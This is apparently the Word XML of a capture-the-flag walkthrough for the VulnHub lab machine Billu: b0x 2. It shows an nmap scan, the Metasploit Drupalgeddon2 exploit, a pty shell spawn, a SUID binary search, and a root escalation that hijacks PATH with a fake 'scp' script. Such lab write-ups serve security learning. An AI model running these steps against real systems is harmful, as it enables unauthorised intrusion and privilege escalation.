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25" w:rsidRDefault="00AB22D8">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AB22D8">
        <w:instrText>https://www.vulnhub.com/entry/billu-b0x-2,238/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00914FBE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://www.vulnhub.com/entry/billu-b0x-2,238/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB22D8" w:rsidRDefault="00682D58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4775ABD7" wp14:editId="7433DB12">
            <wp:extent cx="594360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58" w:rsidRDefault="00682D58"/>
    <w:p w:rsidR="00C2287C" w:rsidRDefault="00C2287C" w:rsidP="00C2287C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682D58" w:rsidRDefault="00C2287C" w:rsidP="00C2287C">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.134</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2287C" w:rsidRDefault="00D63F48" w:rsidP="00C2287C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A601367" wp14:editId="696CF3F0">
            <wp:extent cx="5943600" cy="531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48" w:rsidRDefault="006C4337" w:rsidP="00C2287C">
      <w:r w:rsidRPr="006C4337">
        <w:lastRenderedPageBreak/>
        <w:t>msf6 &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4337" w:rsidRDefault="006C4337" w:rsidP="00C2287C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C4337">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4337">
        <w:t xml:space="preserve">/drupal_drupalgeddon2) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4337">
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4337">
        <w:t xml:space="preserve"> 192.168.21.134</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4337" w:rsidRDefault="0019376C" w:rsidP="00C2287C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0019376C">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0019376C">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0019376C">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0019376C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0019376C">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0019376C">
        <w:t>/drupal_drupalgeddon2) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019376C" w:rsidRDefault="008E1FC8" w:rsidP="00C2287C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CE692DA" wp14:editId="303D5FBC">
            <wp:extent cx="5943600" cy="1518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C8" w:rsidRDefault="00425A20" w:rsidP="00C2287C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="716F35C6" wp14:editId="65821A95">
            <wp:extent cx="188595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20" w:rsidRDefault="00E73334" w:rsidP="00C2287C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E73334">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E73334">
        <w:t xml:space="preserve"> -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E73334">
        <w:t>pty;pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E73334">
        <w:t>("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E73334">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E73334">
        <w:t>")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73334" w:rsidRDefault="000B29C4" w:rsidP="00C2287C">
      <w:r w:rsidRPr="000B29C4">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B29C4">
        <w:t>lsb_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B29C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000B29C4">
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B29C4" w:rsidRDefault="008C0092" w:rsidP="00C2287C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DBD1E3" wp14:editId="5530E351">
            <wp:extent cx="34290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92" w:rsidRDefault="002D143E" w:rsidP="00C2287C">
      <w:r w:rsidRPr="002D143E">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D143E">
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D143E">
        <w:t xml:space="preserve"> -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D143E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D143E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D143E">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002D143E" w:rsidRDefault="007E74F9" w:rsidP="00C2287C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B3631B" wp14:editId="3993F08B">
            <wp:extent cx="40862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50" w:rsidRDefault="00791950" w:rsidP="00D2776E">
      <w:r w:rsidRPr="00791950">
        <w:t>$ find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791950" w:rsidRDefault="00FE2DA1" w:rsidP="00D2776E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF7FE62" wp14:editId="224D5D3F">
            <wp:extent cx="3543300" cy="4505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76E" w:rsidRDefault="00FE7190" w:rsidP="00D2776E">
      <w:r w:rsidRPr="00FE7190">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE7190">
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE7190">
        <w:t xml:space="preserve"> /opt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7190" w:rsidRDefault="0074174C" w:rsidP="00D2776E">
      <w:r w:rsidRPr="0074174C">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0074174C">
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0074174C" w:rsidRDefault="0074174C" w:rsidP="00D2776E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60A3D4EA" wp14:editId="41D05B47">
            <wp:extent cx="5943600" cy="12020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610" cy="12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34" w:rsidRDefault="00D7605F" w:rsidP="00D2776E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D7605F">
        <w:t>$ ./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D7605F">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7605F" w:rsidRDefault="00641207" w:rsidP="00D2776E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F9DED01" wp14:editId="733D8D5D">
            <wp:extent cx="5886450" cy="2200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07" w:rsidRDefault="00572FAF" w:rsidP="00D2776E">
      <w:r w:rsidRPr="00572FAF">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00572FAF">
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00572FAF">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572FAF">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00572FAF" w:rsidRDefault="009350DD" w:rsidP="00D2776E">
      <w:r w:rsidRPr="009350DD">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009350DD">
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009350DD">
        <w:t xml:space="preserve"> "/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009350DD">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009350DD">
        <w:t xml:space="preserve">" &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009350DD">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009350DD" w:rsidRDefault="00B834D3" w:rsidP="00D2776E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CDAE0F" wp14:editId="31D266AA">
            <wp:extent cx="1838325" cy="78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D3" w:rsidRDefault="00810919" w:rsidP="00D2776E">
      <w:r w:rsidRPr="00810919">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00810919">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00810919">
        <w:t xml:space="preserve"> 777 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00810919">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00810919" w:rsidRDefault="000E1833" w:rsidP="00D2776E">
      <w:r w:rsidRPr="000E1833">
        <w:t>$ export PATH=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E1833">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E1833">
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E1833">
        <w:t>PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E1833" w:rsidRDefault="006E5456" w:rsidP="00D2776E">
      <w:r w:rsidRPr="006E5456">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006E5456">
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E5456">
        <w:t xml:space="preserve"> /opt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E5456" w:rsidRDefault="006E5456" w:rsidP="00D2776E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006E5456">
        <w:t>$ ./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E5456">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E5456" w:rsidRDefault="005450AC" w:rsidP="00D2776E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E41F76C" wp14:editId="21CA4211">
            <wp:extent cx="217170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AC" w:rsidRDefault="000B6CBB" w:rsidP="00D2776E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61DBE30A" wp14:editId="64745C76">
            <wp:extent cx="857250" cy="504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2F5" w:rsidRDefault="004952F5" w:rsidP="00D2776E"/>
    <w:p w:rsidR="0074174C" w:rsidRPr="00840C5E" w:rsidRDefault="0074174C" w:rsidP="00D2776E"/>
    <w:sectPr w:rsidR="0074174C" w:rsidRPr="0084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62"/>
    <w:rsid w:val="000B29C4"/>
    <w:rsid w:val="000B6CBB"/>
    <w:rsid w:val="000E1833"/>
    <w:rsid w:val="0019376C"/>
    <w:rsid w:val="002D143E"/>
    <w:rsid w:val="00377B34"/>
    <w:rsid w:val="003E2225"/>
    <w:rsid w:val="00425A20"/>
    <w:rsid w:val="004952F5"/>
    <w:rsid w:val="00510AD2"/>
    <w:rsid w:val="005450AC"/>
    <w:rsid w:val="00572FAF"/>
    <w:rsid w:val="005E02A9"/>
    <w:rsid w:val="00641207"/>
    <w:rsid w:val="006804CE"/>
    <w:rsid w:val="00682D58"/>
    <w:rsid w:val="006C4337"/>
    <w:rsid w:val="006E5456"/>
    <w:rsid w:val="00730434"/>
    <w:rsid w:val="0074174C"/>
    <w:rsid w:val="00787282"/>
    <w:rsid w:val="00791950"/>
    <w:rsid w:val="007E74F9"/>
    <w:rsid w:val="00810919"/>
    <w:rsid w:val="00840C5E"/>
    <w:rsid w:val="008B117C"/>
    <w:rsid w:val="008C0092"/>
    <w:rsid w:val="008E1FC8"/>
    <w:rsid w:val="009350DD"/>
    <w:rsid w:val="00994FD6"/>
    <w:rsid w:val="00AB22D8"/>
    <w:rsid w:val="00B834D3"/>
    <w:rsid w:val="00C2287C"/>
    <w:rsid w:val="00C43162"/>
    <w:rsid w:val="00D2776E"/>
    <w:rsid w:val="00D63F48"/>
    <w:rsid w:val="00D7605F"/>
    <w:rsid w:val="00DF2611"/>
    <w:rsid w:val="00E73334"/>
    <w:rsid w:val="00FE2DA1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313A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{53278202-A6B4-4DDB-AEA6-F74371EA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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-26T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-26T13:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>